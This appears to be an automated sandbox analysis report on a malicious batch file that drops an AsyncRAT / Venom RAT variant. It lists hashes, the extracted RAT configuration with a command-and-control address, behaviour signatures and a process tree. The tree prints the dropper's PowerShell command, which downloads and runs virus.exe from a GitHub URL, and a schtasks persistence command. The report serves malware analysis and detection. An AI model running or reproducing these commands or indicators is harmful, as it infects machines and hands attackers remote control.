Analysis
-
max time kernel
390s -
max time network
386s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-12-2024 22:59
Static task
static1
General
-
Target
test.bat
-
Size
2KB
-
MD5
83834b6e8e0b6ccea0df9ed0c91ecbc9
-
SHA1
6f706a5d11739d2ebb52a1c15732341db0229b2d
-
SHA256
fbb6befab51fcdab9f44079729dd959caecbe24975dfe212e921ec08e5c45f48
-
SHA512
aac78c21a40dfbd0656dcdc47b0a4b9a65b5abaf3097178eae1ae185bfaabbb4aab3f2f722114032bb04559e6978706ba4b6a0c4e10ecf5d8a76391286ac064e
Malware Config
Extracted
https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
66.66.146.74:9511
8906005788005HTGF
-
delay
1
-
install
true
-
install_file
WINDOWS.exe
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x0009000000023ccf-17.dat family_asyncrat -
Blocklisted process makes network request 4 IoCs
flow pid Process 8 3768 powershell.exe 10 3768 powershell.exe 57 324 powershell.exe 58 324 powershell.exe -
pid Process 3768 powershell.exe 324 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation virus.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation WINDOWS.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation virus.exe -
Executes dropped EXE 4 IoCs
pid Process 4348 virus.exe 3776 WINDOWS.exe 1396 virus.exe 3780 WINDOWS.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 4 IoCs
pid Process 2292 timeout.exe 1480 timeout.exe 3968 timeout.exe 1152 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3248 schtasks.exe 4912 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3768 powershell.exe 3768 powershell.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 4348 virus.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe 3776 WINDOWS.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3768 powershell.exe Token: SeDebugPrivilege 4348 virus.exe Token: SeDebugPrivilege 3776 WINDOWS.exe Token: SeDebugPrivilege 1396 virus.exe Token: SeDebugPrivilege 3780 WINDOWS.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3776 WINDOWS.exe 3780 WINDOWS.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 2876 wrote to memory of 3768 2876 cmd.exe 83 PID 2876 wrote to memory of 3768 2876 cmd.exe 83 PID 3768 wrote to memory of 4348 3768 powershell.exe 85 PID 3768 wrote to memory of 4348 3768 powershell.exe 85 PID 4348 wrote to memory of 1640 4348 virus.exe 86 PID 4348 wrote to memory of 1640 4348 virus.exe 86 PID 4348 wrote to memory of 3928 4348 virus.exe 88 PID 4348 wrote to memory of 3928 4348 virus.exe 88 PID 1640 wrote to memory of 3248 1640 cmd.exe 90 PID 1640 wrote to memory of 3248 1640 cmd.exe 90 PID 3928 wrote to memory of 2292 3928 cmd.exe 91 PID 3928 wrote to memory of 2292 3928 cmd.exe 91 PID 3928 wrote to memory of 3776 3928 cmd.exe 92 PID 3928 wrote to memory of 3776 3928 cmd.exe 92 PID 3776 wrote to memory of 2596 3776 WINDOWS.exe 102 PID 3776 wrote to memory of 2596 3776 WINDOWS.exe 102 PID 3776 wrote to memory of 1916 3776 WINDOWS.exe 103 PID 3776 wrote to memory of 1916 3776 WINDOWS.exe 103 PID 1916 wrote to memory of 1480 1916 cmd.exe 106 PID 1916 wrote to memory of 1480 1916 cmd.exe 106 PID 2596 wrote to memory of 2560 2596 cmd.exe 107 PID 2596 wrote to memory of 2560 2596 cmd.exe 107 PID 2876 wrote to memory of 3968 2876 cmd.exe 108 PID 2876 wrote to memory of 3968 2876 cmd.exe 108 PID 2876 wrote to memory of 324 2876 cmd.exe 109 PID 2876 wrote to memory of 324 2876 cmd.exe 109 PID 1396 wrote to memory of 3728 1396 virus.exe 111 PID 1396 wrote to memory of 3728 1396 virus.exe 111 PID 1396 wrote to memory of 4916 1396 virus.exe 112 PID 1396 wrote to memory of 4916 1396 virus.exe 112 PID 4916 wrote to memory of 1152 4916 cmd.exe 115 PID 4916 wrote to memory of 1152 4916 cmd.exe 115 PID 3728 wrote to memory of 4912 3728 cmd.exe 116 PID 3728 wrote to memory of 4912 3728 cmd.exe 116 PID 4916 wrote to memory of 3780 4916 cmd.exe 117 PID 4916 wrote to memory of 3780 4916 cmd.exe 117 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3768 -
C:\Users\Admin\AppData\Local\Temp\virus.exe"C:\Users\Admin\AppData\Local\Temp\virus.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4348 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:3248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD85E.tmp.bat""4⤵
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:2292
-
-
C:\Users\Admin\AppData\Roaming\WINDOWS.exe"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3776 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "WINDOWS"6⤵
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "WINDOWS"7⤵PID:2560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp50DC.tmp.bat""6⤵
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\system32\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
PID:1480
-
-
-
-
-
-
-
C:\Windows\system32\timeout.exetimeout /t 52⤵
- Delays execution with timeout.exe
PID:3968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:324 -
C:\Users\Admin\AppData\Local\Temp\virus.exe"C:\Users\Admin\AppData\Local\Temp\virus.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:3728 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:4912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7D0C.tmp.bat""4⤵
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:1152
-
-
C:\Users\Admin\AppData\Roaming\WINDOWS.exe"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3780
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD52a2a8e440e72804d71b28a253be43b2d
SHA14e535db905170261ca591c4491c454797d7d080f
SHA25686b9e4d3d0315161179f8e7c5b6ddd4333c28b5a8f5c0a2c5dc0556d5d8a195a
SHA512a53aa3e53c6faa9e4710733ea199112e92e0f919ff94135319e92edbf644f4cda5161a6bcbf6e58d205055bc628df87ecf7c77f44a3ab80c63fef7d4a2d18bf2
-
Filesize
1KB
MD5baf55b95da4a601229647f25dad12878
SHA1abc16954ebfd213733c4493fc1910164d825cac8
SHA256ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924
SHA51224f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
156B
MD5a74ebea0f2d5b23c19a53fcf627699d1
SHA1531abf7f1af43474ae2912756ec3021600fd4f47
SHA25616b6454fb5cd8142c6871b4d01a10bdb9cbb742c8fa3931d547ea0257863c598
SHA51207102d3e00e64ca1017e1d180cad0119bb009edd795f62f43035ce8d531c1dea4b94740036cd81184fa8409f5a5590e467a87cae4f1ae7ffb54ae74d4c6a7a02
-
Filesize
151B
MD547e340f1bb2328ac3c683c928c09365a
SHA1176b0896d87c86d60582198f115b1e4517da55f7
SHA256bef12c897570d2194c1c1ef02ecae5c8b80b8df3bec3bcc1952c4e8dcbee33f6
SHA5127c67ac2e1ce34a71659c9f9529a148c32b01f4d7760861ceb315fd935aa3c3873327db33c616a8328e40fdaafe1ca2f8cbcf88d2929ba6ca20266b703089ded8
-
Filesize
151B
MD59b5bbacb23cc1b51935444b65f1f7161
SHA11c03badad130ccf786ab200944e8a2397486f097
SHA25622461c463196880e79926654379a7408f49dadfcddc436f1ee8bdcc451238187
SHA512f8075da4f7665e41a6bcdb69f308db2de8c3b327f16ba6c9f723e7a2c10770529ce9844175953d298f2e8754f8f25a0be1ccaea60a5d592fbc917bb360993f1c
-
Filesize
74KB
MD57a545dbf06e65f7f17f04ae0f5153e0e
SHA1ab20193637edd250eac59fd71b6ea2b7a0faaad4
SHA256c3556cd1169de28cb9f6ba3a06a875f756b1bbadfb51b7ce00c92f23d2cd4f5d
SHA51298a56663c90195b0b22df4dcfd72cc4717e445d5eaa2f4571443becbe38a77121835073cbf56377f5cc11849e160dbe9e156fcff8a3fab2efd9aa97a1876d0d1
-
Filesize
8B
MD5cf759e4c5f14fe3eec41b87ed756cea8
SHA1c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b